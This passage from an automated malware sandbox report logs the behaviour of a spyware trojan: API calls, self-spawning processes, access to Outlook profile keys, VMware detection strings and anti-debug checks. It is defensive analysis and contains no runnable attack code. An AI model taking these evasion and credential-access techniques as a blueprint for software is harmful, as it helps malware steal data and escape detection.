          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABF900
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B822AE
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6FA2B
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEEBB0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7DBD2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B703DA
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B82B28
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAB40
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC841F
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7D466
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2581
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACD5E0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B825DD
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB0D20
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B82D07
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B81D55
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B82EF7
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD6E30
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7D616
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B81FF1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8DFCE
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: String function: 00ABB150 appears 45 times
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041E087 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DEA7 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DF57 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DFD7 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041E081 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004012A4 EntryPoint,NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004014E9 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DF52 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DFD2 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFB040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF99D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFA3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF95F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFAD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF96D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFA710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFA770 NtOpenThread,
          Source: Lc8xQv8iZY.exeReversingLabs: Detection: 48%
          Source: Lc8xQv8iZY.exeVirustotal: Detection: 47%
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeFile read: C:\Users\user\Desktop\Lc8xQv8iZY.exeJump to behavior
          Source: Lc8xQv8iZY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Lc8xQv8iZY.exe C:\Users\user\Desktop\Lc8xQv8iZY.exe
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeProcess created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeProcess created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeFile created: C:\Users\user\AppData\Local\Temp\nsaAF5E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@9/7
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3748:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCommand line argument: ^oA
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: wntdll.pdbUGP source: hvbvmxm.exe, 00000001.00000003.304073189.0000000002740000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000001.00000003.303031511.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: hvbvmxm.exe, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040CC02 push cs; retf 0040h
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040AC96 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004210E9 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004210F2 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0042109C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00421153 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0040EAA3 push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041E5D0 push ecx; iretd
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00419F38 push edx; ret
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041FF93 push ebx; retf
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B0D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeFile created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeJump to dropped file
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\explorer.exe TID: 5288Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 4464Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE6A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeAPI coverage: 6.8 %
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeAPI coverage: 9.3 %
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00410370 FindFirstFileExW,
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000000.349521692.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.349893553.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000004.00000000.317884001.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000004.00000000.324860902.00000000085BD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.323779585.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.326086945.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000004.00000000.350579899.000000000858E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.349521692.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040AA3F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0041273A GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE6A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0041141B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040ED78 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B80019 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B80005 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B8007A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B80149 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B72073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B81074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B441E8 mov eax, dword ptr fs:[00000030h]
